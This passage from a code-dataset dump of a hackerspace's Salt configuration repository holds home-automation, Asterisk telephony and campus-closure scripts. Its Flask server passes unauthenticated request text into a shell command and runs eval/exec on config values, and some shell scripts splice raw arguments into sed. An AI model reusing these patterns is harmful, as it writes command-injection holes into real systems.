= BeautifulSoup(myumbc, \"html.parser\")\n banners_normal = [item.text for item in soup.select(\".stop.banner\")]\n banners = [b.lower() for b in banners_normal]\n\n try:\n paws = soup.select(\"#paw-discussion-14777 span\")[0]\n with open(\"/srv/http/isumbcopen.com/paws.txt\", \"w\") as pawfile:\n pawfile.write(paws.text.strip())\n except:\n pass\n\ndef detail(t):\n try:\n with open(\"/srv/http/isumbcopen.com/detail.txt\", \"w\") as details:\n details.write(t)\n except:\n pass\n\nif banners:\n for text in banners:\n debug(\"text: {}\", text.replace(\"\\n\", \"\"))\n text = text.replace(\"noon\", \"12pm\")\n text = text.replace(\"p.m.\", \"pm\")\n text = text.replace(\"a.m.\", \"am\")\n text = text.split(\".\")[0]\n datestring = \" \".join([word for word in text.split() if (re.match(\"[0-9]\", word) and len(word) < 6) or word in days or any([word.startswith(d) for d in days]) or word in months or re.match(\"[0-9]* ?[pa]\\\\.? ?m\\\\.?\", word)])\n debug(\"date: {}\", datestring)\n\n if not datestring or not datestring.strip():\n print(\"YEP\")\n detail(' '.join(banners_normal))\n exit(0)\n\n time = dateparse(datestring)\n now = datetime.datetime.now()\n\n midnight = time.replace(hour=0, minute=0, second=0, microsecond=0)\n class_start = midnight.replace(hour=5)\n class_end = midnight.replace(hour=20,minute=30)\n\n class_end_before = midnight + datetime.timedelta(hours=-3,minutes=-30)\n class_start_after = midnight + datetime.timedelta(days=1, hours=5)\n\n if debugging:\n td = datetime.timedelta(minutes=30)\n day = datetime.timedelta(days=1)\n\n # YESTERDAY\n if \"y_m\" in args:\n debug(\"yesterday morning\")\n now = now.replace(hour=7) - day\n elif \"y_sm\" in args:\n debug(\"yesterday after-school-morning\")\n now = now.replace(hour=9) - day\n elif \"y_a\" in args:\n debug(\"yesterday afternoon\")\n now = now.replace(hour=13) - day\n elif \"y_e\" in args:\n debug(\"yesterday evening\")\n now = now.replace(hour=19) - day\n elif \"y_n\" in args:\n debug(\"yesterday night\")\n now = now.replace(hour=23) - day\n\n # TODAY\n elif \"n_m\" in args:\n debug(\"now morning\")\n now = now.replace(hour=7)\n elif \"n_sm\" in args:\n debug(\"now after-school-morning\")\n now = now.replace(hour=9)\n elif \"n_a\" in args:\n debug(\"now afternoon\")\n now = now.replace(hour=13)\n elif \"n_e\" in args:\n debug(\"now evening\")\n now = now.replace(hour=19)\n elif \"n_n\" in args:\n debug(\"now night\")\n now = now.replace(hour=23)\n\n # TOMORROW\n elif \"t_m\" in args:\n debug(\"tomorrow morning\")\n now = now.replace(hour=7) + day\n elif \"t_sm\" in args:\n debug(\"tomorrow after-school-morning\")\n now = now.replace(hour=9) + day\n elif \"t_a\" in args:\n debug(\"tomorrow afternoon\")\n now = now.replace(hour=13) + day\n elif \"t_e\" in args:\n debug(\"tomorrow evening\")\n now = now.replace(hour=19) + day\n elif \"t_n\" in args:\n debug(\"tomorrow night\")\n now = now.replace(hour=23) + day\n\n debug(\"now: {:%c}\", now)\n\n if \"close\" in text and \"remain\" not in text:\n detail(\"\")\n debug(\"it's closing...\")\n if class_start < now < time < class_end:\n debug(\"Because {:%c} < {:%c} < {:%c}\", class_start, time, class_end)\n debug(\" and {:%c} < {:%c} < {:%c}\", now, time, class_end)\n print(\"UNTIL {}\".format(str(int(time.strftime(\"%I\")))))\n elif time < now < class_end:\n debug(\"Because {:%c} < {:%c} < {:%c}\", time, now, class_end)\n print(\"NOPE\")\n #elif now < class_end_before < time:\n # print(\"FOR NOW\")\n elif class_end_before < now < class_end:\n print(\"NOPE\")\n else:\n 
debug(\"Because else\")\n print(\"YEP\")\n elif \"open\" in text or \"delay\" in text or (\"remain\" in text and \"close\" in text):\n detail(\"\")\n if \"open\" in text:\n debug(\"says 'open'\")\n if \"delay\" in text:\n debug(\"says 'delay'\")\n\n if time == midnight and class_end_before < now < class_end:\n # If there's no date specified, then it probably is a message saying UMBC will be open throughout the day\n debug(\"it's at midnight\")\n print(\"YEP\")\n elif now > time and now < class_start_after:\n debug(\"Because {0:%c} > {1:%c} and {0:%c} < {2:%c}\", now, time, class_start_after)\n print(\"YEP\")\n elif class_end_before < now < time < class_end:\n debug(\"Because {:%c} < {:%c} < {:%c} < {:%c}\", class_end_before, now, time, class_end)\n print(\"AFTER {}\".format(str(int(time.strftime(\"%I\")))))\n #elif time == midnight and now < class_end_before < time:\n # print(\"FOR NOW\")\n else:\n debug(\"Because else\")\n print(\"YEP\")\n else:\n print(\"YEP?\")\n detail(' '.join(banners_normal))\nelse:\n debug(\"Because no banner\")\n detail(\"\")\n print(\"YEP\")\n" }, { "alpha_fraction": 0.576837420463562, "alphanum_fraction": 0.6169264912605286, "avg_line_length": 17.70833396911621, "blob_id": "8c0ae570393469983a83647f1573e19a7f283471", "content_id": "f1466be87e9eff24fbfbdba991a9156cea6ed515", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 449, "license_type": "no_license", "max_line_length": 98, "num_lines": 24, "path": "/asterisk/scripts/pizzacall", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\nif [ \"$#\" -lt 2 ]; then\n echo \"Usage: $0 <destination> <order-id>\"\n exit 1\nfi\n\nif [ -z \"$2\" ]; then\n echo \"Invalid order ID\"\n exit 1\nfi\n\nVAL=\"$2\"\n\n{\n cat <<EOF | sed \"s/_DEST_/$1/\" | sed \"s%_VARVAL_%$VAL%\" > /var/spool/asterisk/outgoing/call-$$\nChannel: SIP/voipo/_DEST_\nCallerID: \"Hackafe\" <2408982516>\nContext: pizza-order-send\nExtension: start\nPriority: 1\nSetVar: CHANNEL(language)=en\nSetVar: ORDER_ID=_VARVAL_\nEOF\n} &\n" }, { "alpha_fraction": 0.5431235432624817, "alphanum_fraction": 0.5468531250953674, "avg_line_length": 31.5, "blob_id": "84161ddbb1141bb65cbdf2f67c3ca41a67242a85", "content_id": "b7059f92025310318a0814781b863ed4e304ca8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8580, "license_type": "no_license", "max_line_length": 156, "num_lines": 264, "path": "/homeautomation/openhalper.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport flask\nfrom time import sleep, time as now\nimport subprocess\nimport threading\nimport os.path\nimport json\nimport RPi.GPIO as GPIO\nimport requests\nimport functools\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\ntry:\n raise TimeoutExpired()\nexcept NameError:\n class TimeoutExpired(Exception):\n pass\n subprocess.TimeoutExpired = TimeoutExpired\n\ntry:\n subprocess.check_output([\"true\"], timeout=60)\nexcept TypeError:\n subprocess.__real__check_output = subprocess.check_output\n def co_proxy(*args, **kwargs):\n if \"timeout\" in kwargs:\n del kwargs[\"timeout\"]\n return subprocess.__real__check_output(*args, **kwargs)\n subprocess.check_output = co_proxy\nexcept CalledProcessError:\n pass\n\ntry:\n raise FileNotFoundError()\nexcept NameError:\n FileNotFoundError = IOError\nexcept:\n pass\n\nACTIONS = {\n \"say\": {\n \"exec\": 'echo {[text]} | espeak --stdin --stdout | 
aplay',\n \"parse\": lambda r: \"\",\n \"shell\": True\n },\n \"ping\": {\n \"func\": lambda: \"OK\",\n },\n}\n\nPORT = 8081\n\nfor conf_file in \"/etc/openhalper.conf\", os.path.expanduser(\"~/.config/openhalper.conf\"), \"./openhalper.conf\":\n try:\n with open(conf_file) as f:\n conf = json.load(f)\n if \"port\" in conf:\n PORT = conf[\"port\"]\n if \"actions\" in conf:\n ACTIONS.update(conf[\"actions\"])\n except FileNotFoundError:\n pass\n except OSError:\n pass\n except IOError:\n pass\n\nfor action in ACTIONS.values():\n if \"parse\" in action and not callable(action[\"parse\"]):\n action[\"parse\"] = eval(action[\"parse\"])\n\n if \"validate\" in action and not callable(action[\"validate\"]):\n action[\"validate\"] = eval(action[\"validate\"])\n\n if \"func\" in action and not callable(action[\"func\"]):\n action[\"func\"] = eval(action[\"func\"])\n\n if \"modules\" in action:\n for module in action[\"modules\"]:\n try:\n exec(\"import {}\".format(module))\n except:\n print(\"Error importing {}\".format(module))\n\n if \"setup\" in action:\n if type(action[\"setup\"]) is list:\n for act in action[\"setup\"]:\n exec(act)\n else:\n exec(action[\"setup\"])\n\nif len(sys.argv) > 1:\n PORT = int(sys.argv[1])\n\nNEXT_UPDATES = {}\nCACHE = {}\n\ndef start_io():\n for name, item in ACTIONS.items():\n if 'type' in item and item['type'] == \"gpio_out\" or 'gpio_out' in item:\n GPIO.setup(item['pin'] if 'pin' in item else item['gpio_out'], GPIO.OUT)\n\n if 'state' in item:\n GPIO.output(item['pin'] if 'pin' in item else item['gpio_out'], item['state'])\n\n pud = GPIO.PUD_UP\n if 'pull' in item:\n if item['pull'].lower() == \"down\":\n pud = GPIO.PUD_DOWN\n elif item['pull'] == None:\n pud = None\n\n edge = GPIO.BOTH\n if 'edge' in item:\n if item['edge'].lower() == \"falling\":\n edge = GPIO.FALLING\n elif item['edge'].lower() == \"rising\":\n edge = GPIO.RISING\n\n if 'type' in item and item['type'] == \"gpio_in\" or 'gpio_in' in item:\n GPIO.setup(item['pin'] if 'pin' in item else item['gpio_in'], GPIO.IN, pull_up_down=pud)\n GPIO.add_event_detect(item['pin'] if 'pin' in item else item['gpio_in'], edge, callback=functools.partial(do_action, name))\n\n if 'type' in item and item['type'] == \"button\" or \"button\" in item:\n\n GPIO.setup(item['pin'] if 'pin' in item else item['button'], GPIO.OUT)\n if 'edgetype' in item:\n if item['edgetype'] == \"falling\":\n GPIO.output(item['pin'] if 'pin' in item else item['button'], True)\n else:\n GPIO.output(item['pin'] if 'pin' in item else item['button'], False)\n else:\n GPIO.output(item['pin'] if 'pin' in item else item['button'], True)\n\ndef init_intervals():\n for name, item in ACTIONS.items():\n if \"interval\" in item:\n NEXT_UPDATES[name] = now()\n\ndef do_action(name, *_, **kwargs):\n item = ACTIONS[name]\n result = \"\"\n valid = True\n for i in range(item[\"tries\"]) if \"tries\" in item else range(10):\n # Actions\n\n if \"exec\" in item:\n try:\n args = item[\"exec\"]\n try:\n args = [arg.format(kwargs) for arg in item[\"exec\"]]\n except:\n args = item[\"exec\"].format(**{k: v[0] for k,v in kwargs.items()})\n\n result = subprocess.check_output(args, timeout=item.get(\"timeout\", 10), shell=(item[\"shell\"] if \"shell\" in item else False)).decode('ascii')\n except subprocess.CalledProcessError as e:\n return \"Error: {0}\".format(e.returncode)\n except subprocess.TimeoutExpired:\n return \"Timed out\"\n elif \"func\" in item:\n result = item[\"func\"](**kwargs)\n elif \"gpio_in\" in item or \"type\" in item and item['type'] == 
\"gpio_in\":\n result = GPIO.input(item['pin'] if 'pin' in item else item['gpio_in'])\n elif \"button\" in item or \"type\" in item and item['type'] == \"button\":\n if 'edgetype' in item:\n edgetype = item['edgetype']\n else:\n edgetype = \"falling\"\n if edgetype == \"falling\":\n GPIO.output(item['pin'] if 'pin' in item else item['button'], False)\n sleep(kwargs['holdtime'] if 'holdtime' in kwargs else 0.25)\n GPIO.output(item['pin'] if 'pin' in item else item['button'], True)\n else:\n GPIO.output(item['pin'] if 'pin' in item else item['button'], True)\n sleep(kwargs['holdtime'] if 'holdtime' in kwargs else 0.25)\n GPIO.output(item['pin'] if 'pin' in item else item['button'], False)\n result = None\n else:\n result = None\n\n if \"parse\" in item:\n result = item[\"parse\"](result)\n\n # Don't do an action if the item doesn't validate, but\n # do keep trying\n if \"validate\" in item and not item[\"validate\"](result):\n continue\n\n if name in CACHE and CACHE[name][\"value\"] == result:\n if \"always\" not in item or not item[\"always\"]:\n break\n\n # Reactions\n if \"put\" in item:\n requests.put(item[\"put\"].format(value=str(result)), data=str(result))\n\n if \"get\" in item:\n requests.get(item[\"get\"].format(value=str(result)), data=str(result))\n\n if \"post\" in item:\n requests.post(item[\"post\"].format(value=str(result)), data=str(result))\n\n if \"gpio_out\" in item or \"type\" in item and item['type'] == \"gpio_out\":\n if 'state' in kwargs:\n result = bool(int(kwargs['state'][0]))\n GPIO.output(item['pin'] if 'pin' in item else item['gpio_out'], result)\n else:\n result = item['default']\n break\n\n # Don't keep trying if the result is valid\n if \"validate\" not in item or item[\"validate\"](result):\n break\n else:\n valid = False\n\n return result, valid\n\ndef do_update():\n for name, time in NEXT_UPDATES.items():\n if time <= now():\n res, valid = do_action(name)\n if valid:\n CACHE[name] = {\"value\": res, \"time\": now()}\n else:\n print(\"do_update: Not caching request for {0}, it was invalid ({1})\".format(name, res))\n NEXT_UPDATES[name] = now() + ACTIONS[name][\"interval\"]\n\n next = min([v for k, v in NEXT_UPDATES.items()] + [now() + 600])\n if next > now():\n sleep(max(next - now(), 0))\n\ndef handle_request(item, **args):\n res, valid = do_action(item, **args)\n if valid:\n CACHE[item] = {\"value\": res, \"time\": now()}\n else:\n print(\"handle_request: Not caching request for {0}, it was invalid ({1})\".format(item, res))\n return str(res)\n\ndef update():\n start_io()\n init_intervals()\n while True:\n do_update()\n\nupdater = threading.Thread(target=update, name=\"ClimateUpdater\")\nupdater.setDaemon(True)\nupdater.start()\n \napp = flask.Flask(__name__)\n\n@app.route('/<name>', methods=['GET', 'POST'])\ndef serve(name):\n if name in ACTIONS:\n args = flask.request.args\n return handle_request(name, **args)\n else:\n return \"Page not found\", 404\n\napp.run('::', port=PORT, debug=False)\n" }, { "alpha_fraction": 0.4756944477558136, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 31, "blob_id": "fa14ee4616ad747a2326c50adb643e6997a03cb3", "content_id": "d14bddf142a9ee06109afd048681a5a18be2c5f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 288, "license_type": "no_license", "max_line_length": 139, "num_lines": 9, "path": "/asterisk/scripts/callerid", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nSTOPTIME=\"$(($(date '+%s') + 60))\"\n\necho 
\"$$\" >> /tmp/callerid\n\nwhile [ -f /tmp/callerid -a \"$(date '+%s')\" -lt \"$STOPTIME\" ]; do\n /usr/bin/send-text -h 10.1.253.237 -f /usr/share/flaschen-taschen/fonts/10x20.bdf -g 512x20+0+6+1 -b ff0000 -s 20 -O \"Call From: $1 $2\"\ndone\n" }, { "alpha_fraction": 0.618625283241272, "alphanum_fraction": 0.6407982110977173, "avg_line_length": 24.05555534362793, "blob_id": "b3c8fd86f619bf1643eb4d9aab5ea00cca3653d6", "content_id": "e84c78802693a992ee9b3a83948b1da59f53cab7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 451, "license_type": "no_license", "max_line_length": 82, "num_lines": 18, "path": "/asterisk/scripts/astcall-listen", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport sys\nimport time\nimport subprocess\nCALL_EXEC = \"channel originate SIP/intercom-{} extension 468@bridge_listen_entry\"\nDESTS = ['garage', 'den', 'den2', 'mark']\n\nsrc = sys.argv[1].lower()\n\ndest = None\nif len(sys.argv) > 2:\n dest = sys.argv[2].lower()\n\nprocs = []\nfor n in DESTS:\n if n not in src and n in dest:\n subprocess.Popen(['/usr/bin/asterisk', '-rx', CALL_EXEC.format(n)]).wait()\n time.sleep(.05)\n" }, { "alpha_fraction": 0.5302557945251465, "alphanum_fraction": 0.531503438949585, "avg_line_length": 26.169490814208984, "blob_id": "ccaf1dae975bee298e2fe8c4d545e6b481638ba8", "content_id": "6ab7efe0dff2ae62abb382262a1c7ca7dabcab8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1603, "license_type": "no_license", "max_line_length": 88, "num_lines": 59, "path": "/_modules/dns.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "from copy import deepcopy\nimport socket\n\ndef is_listdict(d):\n return isinstance(d, list) and all((isinstance(n, dict) and len(n) == 1 for n in d))\n\ndef resolve(hostname):\n return socket.gethostbyname(hostname)\n\ndef merge_listdict(a, b):\n \"merges b into a\"\n\n a_dict = {}\n b_dict = {}\n\n for elm in a:\n a_dict.update(elm)\n\n for elm in b:\n b_dict.update(elm)\n\n res_dict = merge(a_dict, b_dict)\n\n return [{k: v} for k, v in res_dict.items()]\n\ndef merge(a, b, path=None):\n \"merges b into a\"\n if path is None: path = []\n\n if is_listdict(a) and is_listdict(b):\n return merge_listdict(a, b)\n else:\n for key in b:\n if key in a:\n if isinstance(a[key], dict) and isinstance(b[key], dict):\n merge(a[key], b[key], path + [str(key)])\n elif a[key] == b[key]:\n pass # same leaf value\n else:\n a[key] = b[key]\n else:\n a[key] = b[key]\n return a\n\ndef static_resolve(host):\n if host == 'localhost':\n return host\n\n defaults = __salt__['pillar.get'](\"dns:defaults\", {})\n \n for name, network in __salt__['pillar.get'](\"dns:networks\", {}).items():\n network = merge(deepcopy(defaults), network)\n domain = network['options']['domain-name']\n if host.endswith('.' 
+ domain):\n unqualified_host = host[:-len(domain)-1]\n if unqualified_host in network.get('hosts', {}):\n return network['hosts'][unqualified_host].get('ip', host)\n\n return host\n" }, { "alpha_fraction": 0.6226415038108826, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 20.200000762939453, "blob_id": "ec999c5828b17fe13e026e393ee6ac8e7f5b0810", "content_id": "f427574010df0288a00682468428656b86125c6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 106, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/asterisk/scripts/callerid-stop", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ -f /tmp/callerid ]; then\n cat /tmp/callerid | xargs kill -INT && rm /tmp/callerid\nfi\n" }, { "alpha_fraction": 0.5387840867042542, "alphanum_fraction": 0.5870020985603333, "avg_line_length": 18.079999923706055, "blob_id": "433c3673356b40218393b44ff3e917c113bd848e", "content_id": "d60c18034a7cd424b63c4819febb338d835b12fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 477, "license_type": "no_license", "max_line_length": 118, "num_lines": 25, "path": "/asterisk/scripts/make-call", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\nif [ \"$#\" -lt 3 ]; then\n echo \"Usage: $0 <extension> <command> <data> [wait]\"\n exit 1\nfi\n\necho \"$0 $1 $2 $3\"\n\nif [ -z \"$4\" ]; then\n WAIT=0\nelse\n WAIT=\"$4\"\nfi\n\n{\n sleep $WAIT\n cat <<EOF | sed \"s%_DEST_%$1%\" | sed \"s%_COMMAND_%$2%\" | sed \"s%_DATA_%$3%\" > /var/spool/asterisk/outgoing/call-$$\nChannel: SIP/_DEST_\nApplication: _COMMAND_\nData: _DATA_\nSetVar: CHANNEL(language)=en\nSetVar: CALLERID(num)=2408982516\nSetVar: CALLERID(name)=Hackafe\nEOF\n} &\n" }, { "alpha_fraction": 0.5993537902832031, "alphanum_fraction": 0.6009693145751953, "avg_line_length": 24.79166603088379, "blob_id": "8348411ccd4422b11b18311cb9a5d047e9355417", "content_id": "027f78b337ea8a6566ab0aad36c28cc62f029452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 619, "license_type": "no_license", "max_line_length": 69, "num_lines": 24, "path": "/_modules/hackafe.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "import sys, subprocess\n\ndef espeak(*words):\n exitcode = subprocess.call([\"espeak\", ' '.join(words)])\n if exitcode == 0:\n return True\n else:\n return False\n\ndef stats():\n temperaturestrs = __salt__['mine.get']('*', 'sensor.temperature')\n print(temperaturestrs)\n temperatures = []\n for tempstr in temperaturestrs:\n try:\n temperatures.append(float(tempstr))\n except ValueError:\n print(\"Could not convert: '%s'\" % tempstr)\n\n if temperatures:\n avgtemp = sum(temperatures)/len(temperatures)\n else:\n avgtemp = None\n return [avgtemp]\n" }, { "alpha_fraction": 0.6257225275039673, "alphanum_fraction": 0.6416184902191162, "avg_line_length": 26.68000030517578, "blob_id": "03c980ed08d187aca3b08142f5aa2be4d8a3226b", "content_id": "1d9bbd7b846245e31bf5f6ea7a73049548f50468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 692, "license_type": "no_license", "max_line_length": 65, "num_lines": 25, "path": "/_modules/sensor.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "import subprocess\n\ndef _read_temp(pin=24):\n \"\"\"Return (humidity, temperature) from the temp 
binary.\"\"\"\n try:\n output = subprocess.check_output([\"temp\", str(pin)])\n except subprocess.CalledProcessError as e:\n if e.returncode == 127: # command not found\n return None\n else:\n raise e\n\n humidity, temperature = map(float, output.split(' '))\n if humidity == 0 and temperature == 0: # bad read from sensor\n return None\n\n return humidity, temperature\n\ndef temperature(pin=24):\n humidity, temperature = _read_temp(pin)\n return temperature\n\ndef humidity(pin=24):\n humidity, temperature = _read_temp(pin)\n return humidity\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5243902206420898, "avg_line_length": 15.399999618530273, "blob_id": "ec81e0c397ca175ef2d170327c6d26dea615fbe4", "content_id": "0e3ebb7710205e13c37e9b2b88dd007f28166c1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 82, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/asterisk/scripts/callerid-start", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ ! -f /tmp/callerid ]; then\n /usr/bin/callerid \"$1\" \"$2\" &\nfi\n" }, { "alpha_fraction": 0.5541958212852478, "alphanum_fraction": 0.6241258978843689, "avg_line_length": 21.8799991607666, "blob_id": "f6ed5239d3433bbd5c95269349e38e33bb599d57", "content_id": "0f36a62b2cb794021a3a7c9d5e514ac8310139a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 572, "license_type": "no_license", "max_line_length": 49, "num_lines": 25, "path": "/homeautomation/projector.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport RPi.GPIO as gpio\nimport time\nimport sys\n\ngpio.setmode(gpio.BOARD)\ngpio.setup(11, gpio.OUT, initial=1)\ngpio.setup(15, gpio.OUT, initial=1)\n\nif len(sys.argv) > 1 and sys.argv[1] == \"up\":\n gpio.output(11, 0)\n time.sleep(.1)\n gpio.output(11, 1)\nelif len(sys.argv) > 1 and sys.argv[1] == \"down\":\n gpio.output(15, 0)\n time.sleep(.1)\n gpio.output(15, 1)\nelif len(sys.argv) > 1 and sys.argv[1] == \"stop\":\n gpio.output(11, 0)\n gpio.output(15, 0)\n time.sleep(.1)\n gpio.output(11, 1)\n gpio.output(15, 1)\n\ngpio.cleanup()\n" }, { "alpha_fraction": 0.7886932492256165, "alphanum_fraction": 0.7886932492256165, "avg_line_length": 38.96296310424805, "blob_id": "fe79ee9ddb6db73332d8c232fefb976d855c2996", "content_id": "c0bb95c823b134a0d64b596929ce1a722cf644b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1080, "license_type": "no_license", "max_line_length": 100, "num_lines": 27, "path": "/README.md", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "# Salt Configuration\n\nThis repository contains Salt configuration and rules for Hackafé. If you don't know exactly what\nthat is, please don't modify this.\n\nThe Salt master reads this repository from `/var/git/saltmaster`, which is itself can be pushed to\nfrom developer copies. This is done using Salt's `fileserver_backend: git` feature.\n\n# Provisioning\n\nThe idea motivating most of this project is to make reconfiguring and configuring from scratch\nsystems. For example, we find ourselves frequently wiping and re-provisioning Raspberry Pi's and\nother systems. 
In particular, we can standardize access, passwords, keys, and services such as Salt,\nand home automation helpers.\n\n## Management\n\nIt can be handy to include 'meta' rules which ensure that services such as `salt-minion` are\nproperly enabled and running. This is provided by the `managed` formula.\n\n## Users, Passwords, and Keys\n\nUsers are created and managed by the `users` formula.\n\nPasswords do not yet have a solution.\n\nKeys are dropped into place via the fileserver and are provided also by the `users` formula.\n" }, { "alpha_fraction": 0.6536585092544556, "alphanum_fraction": 0.707317054271698, "avg_line_length": 17.636363983154297, "blob_id": "7567fe08d162e08c6c73f70c33275b7f407a85fc", "content_id": "445563c5491a5979a97680b4a8e8af61cc831d90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 205, "license_type": "no_license", "max_line_length": 52, "num_lines": 11, "path": "/asterisk/scripts/downtimecall", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n{\n cat <<EOF > /var/spool/asterisk/outgoing/call-$$\nChannel: SIP/voipo/*\nCallerID: \"Hackafe\" <2408982516>\nContext: downtime\nExtension: start\nPriority: 1\nSetVar: CHANNEL(language)=en\nEOF\n} &\n" }, { "alpha_fraction": 0.6126126050949097, "alphanum_fraction": 0.6126126050949097, "avg_line_length": 54.5, "blob_id": "30ff43250ff23e189530df293a02ae7e9b6a9806", "content_id": "875cf7d51ba2b187572003c1764974f04451ed86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 111, "license_type": "no_license", "max_line_length": 98, "num_lines": 2, "path": "/isumbcopen/updater_wrapper", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\nOUT=$(/usr/local/bin/updater.py) && echo \"$OUT\" | tr '\\n' ' ' > /srv/http/isumbcopen.com/state.txt\n" }, { "alpha_fraction": 0.4699943959712982, "alphanum_fraction": 0.49467191100120544, "avg_line_length": 30.280702590942383, "blob_id": "5df2413ffa4c00a6df848d6a346cdb97c7d1d5b6", "content_id": "8b1ba46231a7f411a8412a9c227c3f58e169de9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 76, "num_lines": 57, "path": "/asterisk/scripts/pizza", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nORDER=\"$2\"\n\nfunction get_nth_pizza() {\n grep 'PIZZA;' \"/tmp/pizza_${ORDER}\" | head -n $1 | tail -n 1\n}\n\nif [[ \"$1\" == \"add-topping\" ]]; then\n SIDE=\"$3\"\n NAME=\"$4\"\n\n if [[ \"$SIDE\" != \"both\" ]]; then\n\techo -n \"${NAME} on the ${SIDE} side,\" >> \"/tmp/pizza_${ORDER}\"\n else\n\techo -n \"${NAME},\" >> \"/tmp/pizza_${ORDER}\"\n fi\nelif [[ \"$1\" == \"add-pizza\" ]]; then\n SIZE=\"$3\"\n echo -en \"\\nPIZZA;${SIZE}; \" >> \"/tmp/pizza_${ORDER}\"\nelif [[ \"$1\" == \"set-payment\" ]]; then\n METHOD=\"$3\"\n echo -en \"\\nPAYMENT;$3\" >> \"/tmp/pizza_${ORDER}\"\n if [[ \"$METHOD\" == \"credit card\" ]]; then\n\techo -en \"\\nCARD;4100 0000 0000 0005\" >> \"/tmp/pizza_${ORDER}\"\n fi\nelif [[ \"$1\" == \"set-delivery\" ]]; then\n echo -en \"\\nDELIVERY;$3\" >> \"/tmp/pizza_${ORDER}\"\nelif [[ \"$1\" == \"set-tip\" ]]; then\n TIP=\"$3\"\n if [[ \"$TIP\" != \"cash\" ]]; then\n\tTIP=\"$TIP dollars\"\n fi\n echo -en \"\\nTIP;$TIP\" >> \"/tmp/pizza_${ORDER}\"\nelif [[ \"$1\" == \"pizza-count\" ]]; then\n grep 'PIZZA;' \"/tmp/pizza_${ORDER}\" | wc -l\nelif [[ \"$1\" 
== \"pizza-size\" ]]; then\n get_nth_pizza $3 | awk -F ';' '{print $2}'\nelif [[ \"$1\" == \"pizza-toppings\" ]]; then\n get_nth_pizza $3 | awk -F ';' '{print $3}'\nelif [[ \"$1\" == \"payment-method\" ]]; then\n METHOD=$(grep 'PAYMENT' \"/tmp/pizza_${ORDER}\" | awk -F ';' '{print $2}')\n TYPE=$(grep 'DELIVERY' \"/tmp/pizza_${ORDER}\" | awk -F ';' '{print $2}')\n TIP=$(grep 'TIP' \"/tmp/pizza_${ORDER}\" | awk -F ';' '{print $2}')\n TIP=\"${TIP} dollars\"\n if [[ \"$METHOD\" == \"credit\" ]]; then\n\tif [[ \"$TYPE\" == \"delivery\" ]]; then\n\t echo \"${METHOD} with a tip of ${TIP}\"\n\telse\n\t echo ${METHOD}\n\tfi\n else\n\techo ${METHOD}\n fi\nelif [[ \"$1\" == \"order-type\" ]]; then\n grep 'DELIVERY' \"/tmp/pizza_${ORDER}\" | awk -F ';' '{print $2}'\nfi\n" }, { "alpha_fraction": 0.6307692527770996, "alphanum_fraction": 0.6692307591438293, "avg_line_length": 42.33333206176758, "blob_id": "a6d5e232daf3c9f012a2e7e8db5f585f2dc76a45", "content_id": "c34f04ec3f8224bc419ff37ef4a6c84fbefa20f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 130, "license_type": "no_license", "max_line_length": 62, "num_lines": 3, "path": "/asterisk/scripts/wakeupcall", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/sh\n# usage is wakeupcall <extension> <song> <hour> <minute>\necho \"make-call-context $1 wakeup-target 1 SONG $2\" | at $3:$4\n" }, { "alpha_fraction": 0.5618892312049866, "alphanum_fraction": 0.6221498250961304, "avg_line_length": 23.559999465942383, "blob_id": "5d64c52871ecea4f17e7696d877f4e5f43f95945", "content_id": "a8147151b0d9c495a11c56b10f0fb379921ef0dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 614, "license_type": "no_license", "max_line_length": 50, 